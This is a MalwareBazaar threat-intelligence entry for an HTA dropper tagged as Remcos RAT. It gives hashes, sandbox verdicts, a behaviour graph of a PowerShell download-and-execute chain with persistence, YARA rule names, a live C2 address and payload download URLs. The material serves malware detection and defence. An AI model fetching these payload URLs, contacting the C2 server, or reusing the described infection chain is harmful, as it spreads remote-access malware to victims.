MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 10


Intelligence 10 IOCs YARA 3 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6
SHA3-384 hash: 4e5eee0d8a4f8754f3e132c8c9fc15e4a1bed255d1fbaf19da0c16b9a3aa29a0a7e6aca8d43e717e27d9e4c69aa60db1
SHA1 hash: b435d809c0be4a17e966cd381f7b8ed5e7e6bb76
MD5 hash: 6a42c3a78883cd18cae468fda708b16f
humanhash: helium-violet-west-batman
File name:bincnew32.hta
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:1'418 bytes
First seen:2025-08-22 16:57:40 UTC
Last seen:Never
File type:HTML Application (hta) hta
MIME type:text/html
ssdeep 24:RMNmMvC4/ptEt5fNZI8Vt1cPsXRXQst5EdjyuMlbs8j35SktKz:4mM5pOt68vh75sjShfno
Threatray 916 similar samples on MalwareBazaar
TLSH T1D521667D9564E6DD9AB18A5223FBF51ADF2381870180910437902167FF7131ED9E72CA
Magika txt
Reporter abuse_ch
Tags:hta RemcosRAT

Intelligence

File Origin
# of uploads :
1
# of downloads :
48
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Score:
90.2%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68a8a18be9d9dbcfd96d20e7
Tags:
dropper xtreme blic
Result
Verdict:
Malicious
File Type:
HTA File - Malicious
Link:
https://app.docguard.net/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6
Verdict:
Clean
File Type:
html
Link:
https://opentip.kaspersky.com/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6/results?tab=lookup
Result
Threat name:
Remcos
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1763148
Signature
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Detected CypherIt Packer
Detected Remcos RAT
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Found malware configuration
Installs new ROOT certificates
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Drops script at startup location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Search for Antivirus process
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1763148 Sample: bincnew32.hta Startdate: 22/08/2025 Architecture: WINDOWS Score: 100 80 www.bitsavers.org 2->80 82 ustaxes.net 2->82 84 10 other IPs or domains 2->84 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 13 other signatures 2->110 13 mshta.exe 14 2->13         started        17 SecureSync.bat 2->17         started        19 svchost.exe 2->19         started        signatures3 process4 dnsIp5 92 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49685 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->92 120 Suspicious powershell command line found 13->120 122 Obfuscated command line found 13->122 124 Tries to download and execute files (via powershell) 13->124 126 Bypasses PowerShell execution policy 13->126 21 powershell.exe 18 20 13->21         started        128 Detected Remcos RAT 17->128 94 127.0.0.1 unknown unknown 19->94 signatures6 process7 dnsIp8 86 bitsavers.org 208.77.18.144, 49681, 80 TZULOUS United States 21->86 88 ustaxes.net 65.21.85.206, 443, 49682 CP-ASDE United States 21->88 66 C:\Users\Public\fire32.exe, PE32 21->66 dropped 68 C:\Users\Public\ww.pdf, PDF 21->68 dropped 112 Installs new ROOT certificates 21->112 114 Drops PE files to the user root directory 21->114 116 Powershell drops PE file 21->116 26 fire32.exe 27 21->26         started        30 Acrobat.exe 18 63 21->30         started        32 conhost.exe 21->32         started        file9 signatures10 process11 file12 72 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 26->72 dropped 118 Multi AV Scanner detection for dropped file 26->118 34 cmd.exe 1 26->34         started        37 AcroCEF.exe 86 30->37         started        signatures13 process14 dnsIp15 98 Detected CypherIt Packer 34->98 100 Drops PE files with a suspicious file extension 34->100 40 cmd.exe 34->40         started        43 conhost.exe 34->43         started        90 e8652.dscx.akamaiedge.net 23.48.144.248, 49688, 80 AKAMAI-ASN1EU United States 37->90 45 AcroCEF.exe 37->45         started        signatures16 process17 dnsIp18 70 C:\Users\user\AppData\Local\Temp\...\Pipe.pif, PE32 40->70 dropped 48 Pipe.pif 40->48         started        53 tasklist.exe 40->53         started        55 findstr.exe 40->55         started        57 2 other processes 40->57 96 23.200.196.138, 443, 49696 NOS_COMUNICACOESPT United States 45->96 file19 process20 dnsIp21 76 37.27.128.29, 2404, 49703 UNINETAZ Iran (ISLAMIC Republic Of) 48->76 78 geoplugin.net 178.237.33.50, 49704, 80 ATOM86-ASATOM86NL Netherlands 48->78 64 C:\Users\user\AppData\...\SecureSync.bat, PE32 48->64 dropped 102 Detected Remcos RAT 48->102 59 cmd.exe 48->59         started        file22 signatures23 process24 file25 74 C:\Users\user\AppData\...\SecureSync.url, MS 59->74 dropped 62 conhost.exe 59->62         started        process26
Score:
21%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6
Verdict:
inconclusive
YARA:
4 match(es)
Tags:
Html PowerShell
Link:
https://app.malva.re/file/6a42c3a78883cd18cae468fda708b16f
Detection:
remcos
Create hunting rule
Link:
https://mwdb.cert.pl/sample/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6/
Verdict:
Susipicious
Link:
https://tip.neiki.dev/file/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6
Threat name:
Script-WScript.Trojan.Boxter
Create hunting rule
Status:
Malicious
First seen:
2025-08-22 16:47:23 UTC
File Type:
Text (HTML)
Extracted files:
1
AV detection:
6 of 38 (15.79%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=za6vx346fk2ryv4uggxm6i7lwtohd3vj2r25i3nitnynz5fwngta._file
Verdict:
malicious
Label(s):
unc_loader_058
Create hunting rule
Similar samples:
01d35fd250e14d0f3b6562b020dc131ed0003ad4c73b33cdbdfdb5f33b0becba
RemcosRAT
1a5a21f32d74c03bb49bd1cc11c71687cce32c95ea3a4d164913568730e07ae5
RemcosRAT
27a03db1d81c43e4841b70ac590b3d7d6550b1a578f0edd99fbbf164a748390f
RemcosRAT
2d04c13fd74da6be1a58c55a30a2b753656d6a1aa1b0c6d426fe861f37de47c3
RemcosRAT
6a232c8c2bbdc5d00a6d2aad9e9d748b9f2b02fe0bb158da3ba41f0563ecf54f
RemcosRAT
760386ddadc8917c4b822e19f986bb173d267917874a66ff7da11ff2059f9c7b
RemcosRAT
9d1fb3557af008bd1c383ef15f5870f78c6f299ea23781c6b5326d602644fe68
RemcosRAT
error
RemcosRAT
+ 906 additional samples on MalwareBazaar
Result
Malware family:
remcos
Create hunting rule
Score:
  10/10
Tags:
family:remcos botnet:remotehost adware defense_evasion discovery execution rat spyware
Link:
https://tria.ge/reports/250822-vgztqswwcw/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Enumerates processes with tasklist
Checks computer location settings
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies trusted root certificate store through registry
Remcos
Remcos family
Suspicious use of NtCreateUserProcessOtherParentProcess
Malware Config
C2 Extraction:
37.27.128.29:2404
Dropper Extraction:
http://www.bitsavers.org/pdf/tti/10136X07-B_QT_UT_Owners_Mar94.pdf
https://ustaxes.net/fire32.pp
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:CP_AllMal_Detector
Create hunting rule
Author:DiegoAnalytics
Description:CrossPlatform All Malwares Detector: Detect PE, ELF, Mach-O, scripts, archives; overlay, obfuscation, encryption, spoofing, hiding, high entropy, network communication
Rule name:Detect_PowerShell_Obfuscation
Create hunting rule
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.
Rule name:Sus_CMD_Powershell_Usage
Create hunting rule
Author:XiAnzheng
Description:May Contain(Obfuscated or no) Powershell or CMD Command that can be abused by threat actor(can create FP)

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RemcosRAT

HTML Application (hta) hta c83d5bef9e2ab51c579431aecf23ebb4dc71eea9d475d46da89b70dcf4b669a6

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3609330/
  
Delivery method
Distributed via web download

Comments